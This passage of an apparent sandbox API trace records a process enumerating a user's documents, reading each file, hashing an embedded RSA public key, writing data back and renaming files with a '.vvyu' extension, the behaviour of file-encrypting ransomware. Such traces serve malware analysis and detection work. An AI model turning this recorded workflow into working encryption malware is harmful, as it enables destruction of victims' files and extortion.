RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0193.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.736] GetCurrentThreadId () returned 0x66c [0193.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f530 [0193.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.737] GetCurrentThreadId () returned 0x66c [0193.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572d0 [0193.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657228 [0193.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b20 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657300 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea1a68 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b20 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea1c78 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea1e90 [0193.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1c78 | out: hHeap=0x620000) returned 1 [0193.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e90 | out: hHeap=0x620000) returned 1 [0193.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669ac0 | out: hHeap=0x620000) returned 1 [0193.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0ac8 | out: hHeap=0x620000) returned 1 [0193.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.747] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x15b9d, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x15b9d, lpOverlapped=0x0) returned 1 [0193.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.749] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x15ba2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.749] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea1a68 [0193.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea1a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea1e98 [0193.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.750] WriteFile (in: hFile=0x568, lpBuffer=0x2ea1e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea1e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e98 | out: hHeap=0x620000) returned 1 [0193.751] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.751] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.751] CloseHandle (hObject=0x568) returned 1 [0193.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea1a68 [0193.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.753] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\HbBtrfj.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\hbbtrfj.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\HbBtrfj.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hbbtrfj.pptx.vvyu")) returned 1 [0193.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.754] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.757] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e49bc00, ftCreationTime.dwHighDateTime=0x1d89cfb, ftLastAccessTime.dwLowDateTime=0x4f017610, ftLastAccessTime.dwHighDateTime=0x1d8a62b, ftLastWriteTime.dwLowDateTime=0x4f017610, ftLastWriteTime.dwHighDateTime=0x1d8a62b, nFileSizeHigh=0x0, nFileSizeLow=0x4fd9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HeOaqMZgOojF528t.odt", cAlternateFileName="HEOAQM~1.ODT")) returned 1 [0193.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0ac8 [0193.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0193.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0ac8 | out: hHeap=0x620000) returned 1 [0193.757] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\HeOaqMZgOojF528t.odt") returned=".odt" [0193.757] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\HeOaqMZgOojF528t.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\heoaqmzgoojf528t.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.758] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=20441) returned 1 [0193.758] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.761] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4fb3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.761] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.763] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.763] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x4fd9, lpOverlapped=0x0) returned 1 [0193.764] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.764] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.764] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.764] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.765] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.765] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.765] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.765] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.765] GetLastError () returned 0x0 [0193.765] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.765] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.766] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.766] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.766] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4fe0) returned 0x2ea1a68 [0193.766] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0ac8 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x669ac0 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0b10 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b20 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b08 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.767] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a50 [0193.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: 